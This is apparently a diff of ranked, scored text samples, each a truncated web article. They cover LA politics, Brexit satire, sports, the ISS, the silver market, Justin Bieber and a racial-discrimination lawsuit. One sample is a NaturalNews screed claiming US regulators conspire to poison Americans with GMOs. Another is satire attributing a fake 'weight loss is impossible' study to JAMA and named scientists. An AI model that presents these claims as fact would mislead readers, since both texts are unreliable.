end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 43; Score = 5308416.0 -<|begin_of_text|>The 42nd Mayor of the City of Los Angeles, Eric Garcetti, is the first News Conference guest in the new NBC4 studio. Does the mayor agree on Police Chief Beck's "out of policy" decision not to punish eight officers in the Dorner manhunt? NBC4's Conan Nolan talks to the mayor about that and a multiple of other issues including raising the wage to $15 in this three-part interview. (Published Saturday, Feb. 8, 2014) - -Los Angeles Mayor Eric Garcetti says he "expected something stronger" from his police chief in disciplining eight Los Angeles police officers in the shooting of two women a year ago in Torrance. - -While the shooting was determined to be in "violation of policy," Police Chief Charlie Beck has indicated the officers will be returning to street patrols and will be subject to additional training. - -On NBC4's "News Conference" program Sunday morning, Garcetti said he disagreed with the decision. - -"I think I would have respectfully said it should have been something a little more harsh...we don't want to get rid of police officers who have a good career but we do need to make sure this isn't repeated again," Garcetti said. +Rank = 40; Score = 3260416.0 +<|begin_of_text|>News that MPs will get the chance to vote on the final Brexit deal has been welcomed by Labour who plan to use the opportunity to continue doing f**k all about Britain leaving the EU. -NewsConference: Los Angeles Mayor Garcetti on his first 7 months +Leader Jeremy Corbyn immediately responded warmly to the announcement -NBC4's Conan Nolan talks with L.A. Mayor Garcetti about the recent criticism of the mayor's first seven months in office. (Published Saturday, Feb. 8, 2014) +“This vote is a victory for democracy and for the people of this country,” he said. -The victims, a mother and her daughter, were shot while delivering newspapers in the early morning hours of February 7, 2013. Officers believed their target was former LAPD officer Christopher Dorner, who murdered three people during a four day crime spree in Southern California. +“And rest assured we will use it to continue our long-standing policy of doing f**k all about Brexit.” -Despite the disagreement over disciplining the officers, Garcetti voiced support for Beck. +Labour have been committed to doing f**k all about Britain leaving the EU since the referendum was announced by David Cameron, whoever he is, some eighteen months ago. -"My managers I trust and they are going to make different decisions at different points... he's been a super Chief," Garcetti said. +Immediately after the referendum announcement, Jeremy Corbyn swung into action by doing f**k all. -NewsConference: L.A. Mayor Eric Garcetti & High Tech +When campaigning started in earnest Labour remained constant in doing f**k all. -NBC4's Conan Nolan talks with Los Angeles Mayor Eric Garcetti on why the city needs a high tech czar. (Published Saturday, Feb. 8, 2014) +Not wishing to let the momentum drop, at the height of the campaign Shadow Chancellor John McDonnell did f**k all. -On other issues Garcetti defended his efforts at getting rid of the city's business tax, saying it will make the city more competitive in attracting new employers. +Finally, when the referendum result was announced, Jeremy Corbyn did his best to rally shellshocked remainers by doing f**k all. -Garcetti also indicated that he would stay neutral in the campaign to replace Congressman Henry Waxman and that he might endorse a ballot measure that would allow for the recreational +Every day since, Labour has remained proudly committed to doing f**k all about Brexit and, with this new announcement, look set to continue doing f**k all until the country is completely isolated and vilified, and is ultimately reduced to being little more than a nice place for Donald Trump to park his helicopter.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 44; Score = 5308416.0 +Rank = 41; Score = 3211264.0 <|begin_of_text|>USA food safety lags far behind the rest of the world Taiwan bans GMOs from school menus @@ -992,16 +943,7 @@ Entire world revolting against U.S. agricultural imperialism and fascist, corpor (NaturalNews) Even as the fascist, corrupt U.S. government and its regulators (FDA and USDA) actively conspire with the biotech industry to poison Americans with genetically modified foods, Taiwan has already passed and implemented a nationwide law to protect its citizens from GMOs.Nearly a full year ago, Taiwan passedthat achieve remarkable food safety milestones the U.S. government refuses to implement, placing Taiwan far ahead of the United States on food safety. These milestones include:1) Requiring the mandatory labeling of GMOs on all food products that contain 3 percent or more GMOs. Foods that use no GMOs may be labeled "non-GMO"... and many already are, causing their sales to skyrocket across Taiwan. Just last year, imports of non-GMO soybeans to Taiwan grew nearly 300% to 58,000 tons.2) Limiting the use of food additives to just 799 compounds approved by the Taiwan FDA. The FDA of the United States, by comparison, allows tens of thousands of chemicals to be used as additives, even when they are well known to cause cancer.3) All GMO ingredients are required to be registered with the Taiwan government, and food manufacturers that use GMOs are required to establish an origins tracking system to identify where those GMOs originated.4) All the soy milk, tofu, miso and other soy-derived products sold everywhere across the country -- including at cafes and street food vendors -- must be clearly labeled as GMOs if they use genetically modified soy.5) Food products made using genetically modified soy as a processing agent or blended ingredient must also label their final food products as GMO, even if the soybean oil is not, itself, the final product.6) Fines for violating these food safety provisions have been set at NT$50 million.This shows yet again just how far behind the United States is on food safety compared to the rest of the world. Instead of promoting actual food safety, the FDA gives a free pass to GMOs, heavy metals, artificial additives and other toxic chemicals, focusing almost exclusively on bacteriological contamination issues such as e.coli and salmonella.That's why the USA lags far behind the rest of the world on the banning of artificial additives and preservative chemicals, most of which have already been banned across the EU. The ================================================================================ -Rank = 45; Score = 5242880.0 -<|begin_of_text|>Whitson Becomes World's Oldest Female Spacewalker, as EVA-38 Replaces Aging Space Station Batteries - -Two U.S. astronauts, including the oldest woman ever to participate in an Extravehicular Activity (EVA), triumphantly concluded a six-hour and 32-minute spacewalk outside the International Space Station (ISS) earlier today. Expedition 50 Commander Shane Kimbrough and Flight Engineer Peggy Whitson breezed through the task of installing three new adapter plates and hooked up electrical connectors for a trio of new lithium-ion (Li-Ion) batteries on the starboard-side S-4 segment of the station’s Integrated Truss Structure (ITS). Their work heralds the start of a two-year campaign of EVAs and robotics, which will see 48 aging nickel-hydrogen batteries on the port and starboard trusses replaced with 24 smaller, but higher-performing, lithium-ion ones. Working around an hour ahead of the timeline, Kimbrough and Whitson were also able to complete several “get-ahead” tasks, including a photographic survey of the station’s Alpha Magnetic Spectrometer (AMS-2). - -Today’s spacewalk was designated “U.S. EVA-38” and represented the 38th spacewalk to be conducted out of the Quest airlock, with astronauts clad in U.S.-built Extravehicular Mobility Units (EMUs) and conducted in the absence of the space shuttle. Since U.S. EVA-1, way back in February 2002, these excursions have outfitted new hardware, removed and replaced faulty equipment, reconfigured coolant loops, tackled ammonia leaks, and laid cables in readiness for Commercial Crew operations and the arrival or relocation of pressurized modules. Last summer, Expedition 48 spacewalkers Jeff Williams and Kate Rubins performed EVAs 36 and 37 to install an International Docking Adapter (IDA-2) onto the Harmony node and retract the Trailing Thermal Control Radiator (TTCR) on the station’s port-side P-6 truss. - -These U.S. Orbital Segment (USOS)-based EVAs have been performed not only by NASA astronauts, but have also involved German, Russian, Japanese, Italian, and British nationals. They have seen a number of records secured, including Sunita Williams becoming the most experienced female spacewalker and holder of the greatest number of EVAs—seven—ever conducted by a woman. Yet during today’s EVA-38, one of Williams’ achievements was -================================================================================ -Rank = 46; Score = 5144576.0 +Rank = 42; Score = 3096576.0 <|begin_of_text|>Following Liam Reddy's Herculean performance in goals against Melbourne City on Tuesday www.perthglory.com.au have composed this cheeky list of things they believe their goalkeeper could save. The Glory shot-stopper was in vintage form between the posts at AAMI Park, saving two penalties and seven shots to help his side secure a 3-3 draw in a match that was heralded as one of the season's best. @@ -1062,10 +1004,35 @@ The safest hand to pass the baton on the home stretch. Cheated from a big position in the ================================================================================ -Rank = 47; Score = 4980736.0 -<|begin_of_text|>(a) The general principles and factors that the Food and Drug Administration (FDA) considered in arriving at the reference amounts customarily consumed per eating occasion (reference amounts) which are set forth in paragraph (b) of this section, are that: (1) FDA calculated the reference amounts for persons 4 years of age or older to reflect the amount of food customarily consumed per eating occasion by persons in this population group. These reference amounts are based on data set forth in appropriate national food consumption surveys. (2) FDA calculated the reference amounts for an infant or child under 4 years of age to reflect the amount of food customarily consumed per eating occasion by infants up to 12 months of age or by children 1 through 3 years of age, respectively. These reference amounts are based on data set forth in appropriate national food consumption surveys. Such reference amounts are to be used only when the food is specially formulated or processed for use by an infant or by a child under 4 years of age. (3) An appropriate national food consumption survey includes a large sample size representative of the demographic and socioeconomic characteristics of the relevant population group and must be based on consumption data under actual conditions of use. (4) To determine the amount of food customarily consumed per eating occasion, FDA considered the mean, median, and mode of the consumed amount per eating occasion. (5) When survey data were insufficient, FDA took various other sources of information on serving sizes of food into consideration. These other sources of information included: (i) Serving sizes used in dietary guidance recommendations or recommended by other authoritative systems or organizations; (ii) Serving sizes recommended in comments; (iii) Serving sizes used by manufacturers and grocers; and (iv) Serving sizes used by other countries. (6) Because they reflect the amount customarily consumed, the reference amount and, in turn, the serving size declared on the product label are based on only the edible portion of food, and not bone, seed, shell, or other inedible components. (7) The reference amount is based on the major intended use of the food (e.g., milk as a beverage and not as an addition to cereal). (8) The reference amounts for products that are consumed as an ingredient of other foods, but that may also be consumed in the form in which they are purchased (e.g., butter), are based on use in the form purchased. (9) FDA sought to ensure that foods that have similar dietary usage, product characteristics, and customarily consumed +Rank = 43; Score = 3080192.0 +<|begin_of_text|>Whitson Becomes World's Oldest Female Spacewalker, as EVA-38 Replaces Aging Space Station Batteries + +Two U.S. astronauts, including the oldest woman ever to participate in an Extravehicular Activity (EVA), triumphantly concluded a six-hour and 32-minute spacewalk outside the International Space Station (ISS) earlier today. Expedition 50 Commander Shane Kimbrough and Flight Engineer Peggy Whitson breezed through the task of installing three new adapter plates and hooked up electrical connectors for a trio of new lithium-ion (Li-Ion) batteries on the starboard-side S-4 segment of the station’s Integrated Truss Structure (ITS). Their work heralds the start of a two-year campaign of EVAs and robotics, which will see 48 aging nickel-hydrogen batteries on the port and starboard trusses replaced with 24 smaller, but higher-performing, lithium-ion ones. Working around an hour ahead of the timeline, Kimbrough and Whitson were also able to complete several “get-ahead” tasks, including a photographic survey of the station’s Alpha Magnetic Spectrometer (AMS-2). + +Today’s spacewalk was designated “U.S. EVA-38” and represented the 38th spacewalk to be conducted out of the Quest airlock, with astronauts clad in U.S.-built Extravehicular Mobility Units (EMUs) and conducted in the absence of the space shuttle. Since U.S. EVA-1, way back in February 2002, these excursions have outfitted new hardware, removed and replaced faulty equipment, reconfigured coolant loops, tackled ammonia leaks, and laid cables in readiness for Commercial Crew operations and the arrival or relocation of pressurized modules. Last summer, Expedition 48 spacewalkers Jeff Williams and Kate Rubins performed EVAs 36 and 37 to install an International Docking Adapter (IDA-2) onto the Harmony node and retract the Trailing Thermal Control Radiator (TTCR) on the station’s port-side P-6 truss. + +These U.S. Orbital Segment (USOS)-based EVAs have been performed not only by NASA astronauts, but have also involved German, Russian, Japanese, Italian, and British nationals. They have seen a number of records secured, including Sunita Williams becoming the most experienced female spacewalker and holder of the greatest number of EVAs—seven—ever conducted by a woman. Yet during today’s EVA-38, one of Williams’ achievements was +================================================================================ +Rank = 44; Score = 3014656.0 +<|begin_of_text|>WASHINGTON—According to a groundbreaking new study published Monday in the Journal Of The American Medical Association, it is impossible to lose weight, no one has ever lost a single pound of fat through diet or exercise, and those attempting to do so are advised to abandon their weight loss goals immediately. + +The study, conducted by scientists at The National Weight Control Registry, determined conclusively that shedding excess weight has never occurred, changing your appearance is impossible, and that it actually feels “pretty nice” to just give up and realize that you’re powerless to alter your body mass index in any way, shape, or form. + +Advertisement + +“Our findings indicate that if you’re trying to lose weight, you will fail—and that’s because you can’t, no one has, and you need to stop trying because it will never happen,” said Dr. Rena Wing, lead author of the report. “You could work out every day and eat nothing, and you still wouldn’t lose an ounce. And the sooner you throw up your hands and make peace with that fact, the better off you’ll be.” + +“Our data demonstrates that you’re doomed to look the way you look,” Wing added. “You are stuck in your body and it’s never going to look any better than it does right now. In fact, it will only get worse.” + +According to the study, running on a treadmill every morning at 6 a.m. will not help anyone lose weight, and neither will cutting carbohydrates from one’s diet, eating smaller portions throughout the day, doing yoga, or hiring a personal trainer. In addition, the study went on to state that everyone who tried the previous methods have only ended up feeling disappointed and in some cases heartbroken, especially after individuals step onto a scale and realize that, after two weeks of healthy eating and nonstop exercise, they’ve actually gained two or more pounds. + +Advertisement + +The report added that skinny people stay skinny, overweight people remain overweight, that’s how it has always been, that’s how it will always be, and every study, book, or news article you’ve ever read that has told you otherwise has been totally and completely wrong. + +“Going to the gym is a waste of time if you are doing it to lose weight,” said University of California physiologist Dr. Andrew Novak, adding that time working out would be better spent reading, spending time with your family, sleeping, watching television, or eating. “Now, if you are exercising to prevent heart disease or cancer, well, new evidence has come to light that ================================================================================ -Rank = 48; Score = 4980736.0 +Rank = 45; Score = 2899968.0 <|begin_of_text|>Silver Physical Supplies and Price Action The basic tenets of economics tell us that supply, demand, and price as all intertwined, especially in free markets. While the silver market may be not as free as we would like, compared to most, it is relatively free, and it should be very much subject to basic economic laws. @@ -1088,51 +1055,35 @@ This is perhaps the irony of the silver markets, or any non-replacement investme In the long ================================================================================ -Rank = 49; Score = 4947968.0 -<|begin_of_text|>Amazon To Hachette And Authors: Here, Let Us Explain Basic Price Elasticity To You - -from the lower-price,-make-more-money-dimwits dept - -A key objective is lower e-book prices. Many e-books are being released at $14.99 and even $19.99. That is unjustifiably high for an e-book. With an e-book, there's no printing, no over-printing, no need to forecast, no returns, no lost sales due to out-of-stock, no warehousing costs, no transportation costs, and there is no secondary market -- e-books cannot be resold as used books. E-books can be and should be less expensive. - -It's also important to understand that e-books are highly price-elastic. This means that when the price goes up, customers buy much less. We've quantified the price elasticity of e-books from repeated measurements across many titles. For every copy an e-book would sell at $14.99, it would sell 1.74 copies if priced at $9.99. So, for example, if customers would buy 100,000 copies of a particular e-book at $14.99, then customers would buy 174,000 copies of that same e-book at $9.99. Total revenue at $14.99 would be $1,499,000. Total revenue at $9.99 is $1,738,000. - -The important thing to note here is that at the lower price, total revenue increases 16%. This is good for all the parties involved: The customer is paying 33% less. - -The author is getting a royalty check 16% larger and being read by an audience that's 74% larger. And that 74% increase in copies sold makes it much more likely that the title will make it onto the national bestseller lists. (Any author who's trying to get on one of the national bestseller lists should insist to their publisher that their e-book be priced at $9.99 or lower.) - -Likewise, the higher total revenue generated at $9.99 is also good for the publisher and the retailer. At $9.99, even though the customer is paying less, the total pie is bigger and there is more to share amongst the parties. Keep in mind that books don't just compete against books. Books compete against mobile games, television, movies, Facebook, blogs, free news sites and more. If we want a healthy reading culture, we have to work -================================================================================ -Rank = 50; Score = 4947968.0 -<|begin_of_text|>Still image from video of Justin Bieber during a DUI test at the Miami Beach Police Station. - -MIAMI (CBSMiami) – Video of Justin Bieber captured shortly after his arrest on Miami Beach shows the pop star submitting to a sobriety test in which he appears to momentarily lose his balance while attempting to walk along a straight white line. - -In the clip from the holding area of the Miami Beach Police Department, part of more than 9 hours of video released Wednesday, Bieber is walking heel to toe when he slightly stumbles as he turns. He starts the walk over again. +Rank = 46; Score = 2867200.0 +<|begin_of_text|>The electronic billboard is on the Command Transportation building near Niles Center Road. -Bieber then removes several items of clothing for a pat down. +Friday's epic USA versus Canada Winter Olympic hockey matchup highlighted another spat between the two countries involving pop star Justin Bieber. -He’s eventually led to a holding cell where he waits for a couple hours before eventually being transported via van to jail. +A new electronic scoreboard in a Chicago suburb shows Chicago Blackhawks forward Patrick Kane -- who plays for the USA -- and Team Canada's Jonathan Toews in between a picture of Bieber. The caption says "Loser Keeps Biebs." -The embattled entertainer can be seen doing push-ups and pacing in the small space while he waits. +Bieber, who's Canadian, lives in Los Angeles, but after several high-profile incidents, many Americans have called for the singer to be deported. -The videos do not contain audio. +Best of the Sochi Olympics: Day 13 -Attorneys for CBS4 and its news partner the Miami Herald, along with attorneys for media outlets including CNN and the Associated Press, went to court last week to argue that since the tapes have been turned over to the defense as part of the discovery process in the case; the videos are now public record, and open to being viewed in their entirety. +Bieber is also infamous among Chicagoans for a controversy he ignited after the Hawks won the Stanley Cup championship last year. -Tuesday, Bieber’s defense team said they did not object to prosecutors releasing most of the video footage with the exception of five video clips which may show the 19-year old pop star urinating into a cup for a drug test. +While the singer was in the Blackhawks' locker room at the United Center taking pictures of the trophy, he was photographed standing on the Indian head logo, prompting a huge outcry of anger from fans of the team. -Web Extra: Surveillance Video Recorded In Miami Beach Police Department Following Justin Bieber’s Arrest +After Canada won the Olympic gold medal game in Sochi, 1-0, the company immediately followed up with a new billboard below. -As for the five disputed video clips, Judge William Altfield will view them, and review more court filings, before announcing his decision on March 4th. +Hey Canada, best 2 out of 3… errr… best 3 out of 5? pic.twitter.com/n7tLp8qyu0 — Command Sign (@CommandSign) February 21, 2014<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 47; Score = 2834432.0 +<|begin_of_text|>Seven former Illinois women’s basketball players are suing the university, claiming that head coach Matt Bollant and former assistant coach Mike Divilbiss violated Title VI by creating a racially hostile environment. -Police stopped Bieber and singer Khalil Amir Sharieff on January 23rd after what they said was an illegal street drag race involving exotic cars. +The players are suing for $10 million in compensatory and punitive damages as well as attorney’s fees. -Breath tests showed that Bieber’s blood-alcohol content was below the.02 legal limit for underage drivers, but toxicology tests revealed the presence of the active ingredient in marijuana and the antidepressant Xanax. +The specific claims—filed by Amarah Coleman, Alexis Smith, Taylor Tuck, Nia Oden, Sarah Livingston, Taylor Gleason, and Jacqui Gran—against Bollant are broken down into 13 specific points in the lawsuit: -Bieber has pleaded not guilty to driving under the influence, resisting arrest and invalid-license charges.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +a. Instituted segregated practices singling out the black Plaintiffs,Alexis Smith, Nia Oden and Taylor Tuck, as “crabs” because one crab can climb out of a bucket, but more than one pull eachother down in and none can get out; b. Referred to the black Plaintiffs, Alexis Smith, Nia Oden andTaylor Tuck, as “toxic.” c. Referred to these segregated practices as “the dog pound,” indirectly labeling the black Plaintiffs, Alexis Smith, Nia Odenand Taylor Tuck, dogs; d. Appointed a white player captain without a team vote and even though the majority of players at the time were black; e. Relegated and/or threatened relegation of the white Plaintiffs, Taylor Gleason and/or Jacqui Grant, to the “dog pound” in retaliation for these Plaintiffs’ continued association with and support of the black Plaintiffs against the racially hostile environment created by the Defendants, and labeled the whitePlaintiff in the segregated practices as a “mascot;” f. Instituted segregated travel room assignments, prohibiting white players from rooming with black players, including among the white and black Plaintiffs; g. During team preparations for games against other school swhose teams were predominantly made of black players, singled out the black Plaintiffs and other black teammates to ask what the players on the other team were thinking or going to do,implying that blacks think differently than whites; h. During team preparations for games against other schools whose teams were predominantly made of white players, and in the context of subpar. (g), above, did not ask the black players what the other team’s white players were thinking or going to do; i. During team preparations for games, referred to opposing teams predominantly made of black players as undisciplined and unintelligent, and referred to opposing teams predominantly made of white players as disciplined and intelligent; j. ================================================================================ -Rank = 51; Score = 4915200.0 +Rank = 48; Score = 2801664.0 <|begin_of_text|>Stuart Heritage reimagines the exchange of letters between the former culture secretary and David Cameron relating to her resignation following her expenses scandal LETTER TO THE PRIME MINISTER @@ -1159,322 +1110,349 @@ I did mention I went to a comprehensive, didn't I? The only reason I became an MP was that I wanted to give something back. Sadly, there was some disagreement about the ================================================================================ -Rank = 52; Score = 4849664.0 -<|begin_of_text|>Major League Soccer and adidas on Monday revealed the jersey that will be worn by the MLS All-Stars when they take on Tottenham Hotspur at the 2015 AT&T MLS All-Star Game on July 29 at Dick's Sporting Goods Park in Colorado. - -The standout feature of the jersey is the traditional soccer sash featuring a modern design that incorporates both a star from the US flag and the leaf from the Canadian flag to commemorate the two nations that make up the league. The same sash design is also found on the neck taping. +Rank = 49; Score = 2736128.0 +<|begin_of_text|>The 42nd Mayor of the City of Los Angeles, Eric Garcetti, is the first News Conference guest in the new NBC4 studio. Does the mayor agree on Police Chief Beck's "out of policy" decision not to punish eight officers in the Dorner manhunt? NBC4's Conan Nolan talks to the mayor about that and a multiple of other issues including raising the wage to $15 in this three-part interview. (Published Saturday, Feb. 8, 2014) -The primary colors of the shirt are red, white and blue in a nod to the new MLS crest, which features those same colors. The three stars that make up the MLS logo are also present on the back of the All-Star jersey with the words identifying the three league pillars they represent: "Club, Country, Community" (below, right). +Los Angeles Mayor Eric Garcetti says he "expected something stronger" from his police chief in disciplining eight Los Angeles police officers in the shooting of two women a year ago in Torrance. -It's also a special 20th-season shirt, celebrating the league's history with a jock tag on the lower left area of the authentic shirts (below, left). +While the shooting was determined to be in "violation of policy," Police Chief Charlie Beck has indicated the officers will be returning to street patrols and will be subject to additional training. -The first players named to the AT&T MLS All-Star team, as well as the Commissioner's two annual selections, were to be revealed on Monday 